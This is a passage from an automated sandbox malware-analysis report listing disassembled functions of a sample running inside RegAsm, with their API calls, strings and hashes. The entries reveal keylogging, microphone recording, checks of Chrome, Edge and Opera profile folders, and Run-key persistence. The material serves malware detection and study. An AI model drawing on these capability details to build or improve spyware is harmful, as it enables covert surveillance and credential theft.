                                                                                                                                                                                                  Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                                                                                    • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                  • String ID: Unknown exception
                                                                                                                                                                                                  • API String ID: 3476068407-410509341
                                                                                                                                                                                                  • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                                  • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                                                                                                                                  Function 004488EB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DateFormat
                                                                                                                                                                                                  • String ID: GetDateFormatEx$t'`/
                                                                                                                                                                                                  • API String ID: 2793631785-3410012695
                                                                                                                                                                                                  • Opcode ID: 08512e2db11ba7aa95eab038a2ecf7dec974ef1ba91203f2f666c0ca1d0f2951
                                                                                                                                                                                                  • Instruction ID: f6941c7478d5eab8e57398c9d6433ca31c473008bc8aa5bb9dba32c70cc90d51
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08512e2db11ba7aa95eab038a2ecf7dec974ef1ba91203f2f666c0ca1d0f2951
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7101483254060DFBCF026F90DD02EAE3F62EB18711F404529FE0556162DB3A8932EB99
                                                                                                                                                                                                  Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • waveInPrepareHeader.WINMM(00839000,00000020,?), ref: 00401849
                                                                                                                                                                                                  • waveInAddBuffer.WINMM(00839000,00000020), ref: 0040185F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: wave$BufferHeaderPrepare
                                                                                                                                                                                                  • String ID: XMG
                                                                                                                                                                                                  • API String ID: 2315374483-813777761
                                                                                                                                                                                                  • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                                                                                                                                  • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                                                                                                                                  Function 004486AF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,004540DC,?,00000000,?,?,0045407B,?,?,?,004540DC), ref: 0044870C
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                  • String ID: {@E$t'`/
                                                                                                                                                                                                  • API String ID: 1825529933-542622644
                                                                                                                                                                                                  • Opcode ID: c59ff1600e81a9d7cc14e49ba47d46eb51e483d76546d1775d30d5012d646167
                                                                                                                                                                                                  • Instruction ID: 8e6736c838897f6528360bd958164f8ce9b2e0187cfd10d1682bb83c2631b037
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c59ff1600e81a9d7cc14e49ba47d46eb51e483d76546d1775d30d5012d646167
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F010032500209FBCF02AF90EC01CAE7F66EF48350F018159FE0866220CB36C931EB98
                                                                                                                                                                                                  Function 00448A2D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39timeCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetTimeFormatW.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 00448A86
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FormatTime
                                                                                                                                                                                                  • String ID: GetTimeFormatEx$t'`/
                                                                                                                                                                                                  • API String ID: 3606616251-4102510658
                                                                                                                                                                                                  • Opcode ID: 8a4767d2b63e75696d82fe05f2c989be0e1c06ee89b898a8ba636724bf27208b
                                                                                                                                                                                                  • Instruction ID: 5d578e1c3c206df355c43574921470766163c15c74a73bc4749945e38d66d5e1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a4767d2b63e75696d82fe05f2c989be0e1c06ee89b898a8ba636724bf27208b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDF0AF3164060CFBDF02AF61DC02EAF7F25EF08701F00456AFC0566262DA768D25ABD9
                                                                                                                                                                                                  Function 00448A9D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,00451688,?,00000055,00000050), ref: 00448AE7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DefaultUser
                                                                                                                                                                                                  • String ID: GetUserDefaultLocaleName$t'`/
                                                                                                                                                                                                  • API String ID: 3358694519-1583144982
                                                                                                                                                                                                  • Opcode ID: 963100d87cc2d1b714632f50baf0acd0904c40482c73aa355cf21ffb174d551f
                                                                                                                                                                                                  • Instruction ID: cb50fb5ec78b6d707ffa4f8e888d61193b675851c302ce42c921a9a72cfaf747
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 963100d87cc2d1b714632f50baf0acd0904c40482c73aa355cf21ffb174d551f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CF02431640208FBDB016F65DC02E9EBF61EB04711F00406FFD08AA192EEB98D14968D
                                                                                                                                                                                                  Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                                                                                  • API String ID: 1174141254-4188645398
                                                                                                                                                                                                  • Opcode ID: 29b03ca63f58c4e9cb5d44d4ea3b58437774ba523255f91807ed95477180a7a0
                                                                                                                                                                                                  • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29b03ca63f58c4e9cb5d44d4ea3b58437774ba523255f91807ed95477180a7a0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                                                                                                                                                  Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                                                                  • API String ID: 1174141254-2800177040
                                                                                                                                                                                                  • Opcode ID: 54fa268e09270b066402298ccbf44bb2cc4e581b8543ef34c8c39420bd5cdf49
                                                                                                                                                                                                  • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54fa268e09270b066402298ccbf44bb2cc4e581b8543ef34c8c39420bd5cdf49
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                                                                                                                                  Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                  • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                                                                                                  • API String ID: 1174141254-1629609700
                                                                                                                                                                                                  • Opcode ID: 065b68070bdbd5b2fe1a65daa2b69e6499b3515447771c21861f83453f785150
                                                                                                                                                                                                  • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 065b68070bdbd5b2fe1a65daa2b69e6499b3515447771c21861f83453f785150
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                                                                                                                                  Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                                                                                                                                    • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                                                                                                                                                                    • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                                                                                                                    • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                                                                                                                                                                                    • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                                                                                                                    • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                                                                                                                                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                                                                                                                                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                                                                                                                                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                                                  • String ID: [AltL]$[AltR]
                                                                                                                                                                                                  • API String ID: 2738857842-2658077756
                                                                                                                                                                                                  • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                                                                                                                  • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                                                                                                                                  Function 004487E6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Free
                                                                                                                                                                                                  • String ID: FlsFree$t'`/
                                                                                                                                                                                                  • API String ID: 3978063606-1518515932
                                                                                                                                                                                                  • Opcode ID: f639ac55640d1e466334e240508b6cf44afd65e2d168f9cdd456b26f93361ae4
                                                                                                                                                                                                  • Instruction ID: c2240784685aecd6f47a0bca57caed754204828342c7a30858990c1a98a2f1dd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f639ac55640d1e466334e240508b6cf44afd65e2d168f9cdd456b26f93361ae4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86E0E531B41618FBD3017F25AC02A6FBB60DB44B12B5001AEFC0597241DE795D14D6DE
                                                                                                                                                                                                  Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExecuteShell
                                                                                                                                                                                                  • String ID: !D@$open
                                                                                                                                                                                                  • API String ID: 587946157-1586967515
                                                                                                                                                                                                  • Opcode ID: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                                                                                                                                  • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                                                                                                                                  Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: State
                                                                                                                                                                                                  • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                                                  • API String ID: 1649606143-2446555240
                                                                                                                                                                                                  • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                                                                                                                  • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                                                                                                                                  Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Init_thread_footer__onexit
                                                                                                                                                                                                  • String ID: ,kG$0kG
                                                                                                                                                                                                  • API String ID: 1881088180-2015055088
                                                                                                                                                                                                  • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                                                                                                                                  • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                                                                                                                                                  Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DeleteOpenValue
                                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                                                                  • API String ID: 2654517830-1051519024
                                                                                                                                                                                                  • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                                                                                  • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                                                                                                                                  Function 0040B8A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DeleteDirectoryFileRemove
                                                                                                                                                                                                  • String ID: pth_unenc
                                                                                                                                                                                                  • API String ID: 3325800564-4028850238
                                                                                                                                                                                                  • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                                                                                                                  • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                                                                                                                                                  • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                                                                                                                                                  Function 0041288B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
